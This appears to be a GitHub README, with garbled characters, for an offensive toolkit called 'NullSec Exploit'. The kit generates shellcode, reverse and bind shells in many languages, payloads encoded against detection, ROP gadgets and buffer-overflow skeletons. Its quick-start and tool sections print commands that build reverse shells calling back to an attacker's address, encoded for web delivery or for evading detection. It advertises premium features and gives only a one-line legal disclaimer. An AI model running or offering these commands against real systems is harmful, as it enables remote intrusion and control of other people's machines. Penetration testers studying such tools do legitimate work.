๐ NullSec Exploit
March 5, 2026 ยท View on GitHub
๐ NullSec Exploit
Advanced Exploit Development & Payload Generation
โโโโ โ โ โโ โโโ โโโ โโโโโโ โโโโโโ โโโโโโ
โโ โโ โ โโ โโโโโโโโ โโโโ โโโ โ โโ โ โโโโ โโ
โโโ โโ โโโโโโ โโโโโโโโ โโโโ โ โโโโ โโโโ โโโ โ
โโโโ โโโโโโโโ โโโโโโโโ โโโโ โ โโโโโโ โ โโโโ โโโโ
โโโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โ
โ โโ โ โ โโโโ โ โ โ โโโ โโ โโโ โโ โโโ โ โโโ โโ โโ โโ โ โ
โ โ โ โ โ โ โ โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโ E X P L O I T โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
bad-antics
๐ Join x.com/AnonAntics for premium features!
๐ฌ Demo
Generating reverse shells in bash, python, php, perl, ruby, netcat, powershell, java, and 14 more languages โ with base64/URL encoding support
๐ฏ Features
| Tool | Language | Description | Free | Premium |
|---|---|---|---|---|
| shellgen | Python | Shellcode generator | โ | ๐ฅ |
| payloader | Python | Multi-platform payloads | โ | ๐ฅ |
| ropfinder | C | ROP gadget finder | โ | ๐ฅ |
| encoder | Python | Payload encoding/obfuscation | โ | ๐ฅ |
| revshell | Python | Reverse shell generator | โ | ๐ฅ |
| bofgen | C | Buffer overflow skeleton | โ | ๐ฅ |
๐ Structure
nullsec-exploit/
โโโ c/
โ โโโ ropfinder/ # ROP gadget finder
โ โโโ bofgen/ # BOF exploit generator
โ โโโ shellcode/ # Raw shellcode templates
โโโ python/
โ โโโ shellgen.py # Shellcode generator
โ โโโ payloader.py # Payload generator
โ โโโ encoder.py # Encoding utilities
โ โโโ revshell.py # Reverse shell gen
โโโ asm/
โ โโโ linux_x64/ # Linux x64 shellcode
โ โโโ linux_x86/ # Linux x86 shellcode
โ โโโ windows_x64/ # Windows x64 shellcode
โ โโโ windows_x86/ # Windows x86 shellcode
โโโ templates/
โโโ exploits/ # Exploit templates
โโโ payloads/ # Payload templates
๐ง Shellcode Types
Linux
| Type | x86 | x64 | Description |
|---|---|---|---|
| exec | โ | โ | Execute command |
| bind | โ | โ | Bind shell |
| reverse | โ | โ | Reverse shell |
| meterpreter | โ | โ | Meterpreter stage |
Windows
| Type | x86 | x64 | Description |
|---|---|---|---|
| exec | โ | โ | Execute command |
| bind | โ | โ | Bind shell |
| reverse | โ | โ | Reverse TCP |
| messagebox | โ | โ | MessageBox PoC |
๐ Quick Start
# Generate reverse shell shellcode
python3 shellgen.py -t reverse -l 192.168.1.100 -p 4444 -a x64 -o linux
# Generate encoded payload
python3 encoder.py -i shellcode.bin -e xor -k 0x41 -o encoded.bin
# Generate one-liner reverse shells
python3 revshell.py -l 192.168.1.100 -p 4444 --all
# Find ROP gadgets
./ropfinder -f /lib/x86_64-linux-gnu/libc.so.6 -o gadgets.txt
๐ง Tool Details
shellgen.py - Shellcode Generator
# Linux x64 reverse shell
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 -a x64 -o linux
# Windows x86 bind shell
python3 shellgen.py -t bind -p 4444 -a x86 -o windows
# With encoding
python3 shellgen.py -t exec -c "id" -a x64 -o linux -e xor
# Output formats
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format c
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format python
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format raw
revshell.py - Reverse Shell Generator
Supports:
- Bash
- Python
- PHP
- Perl
- Ruby
- Netcat
- PowerShell
- Java
- Groovy
# Generate all reverse shells
python3 revshell.py -l 10.0.0.1 -p 4444 --all
# Specific language
python3 revshell.py -l 10.0.0.1 -p 4444 -t python
# URL encoded (for web)
python3 revshell.py -l 10.0.0.1 -p 4444 -t bash --urlencode
# Base64 encoded
python3 revshell.py -l 10.0.0.1 -p 4444 -t powershell --base64
โ ๏ธ Legal Disclaimer
For authorized security testing only. Creating and using exploits without authorization is illegal.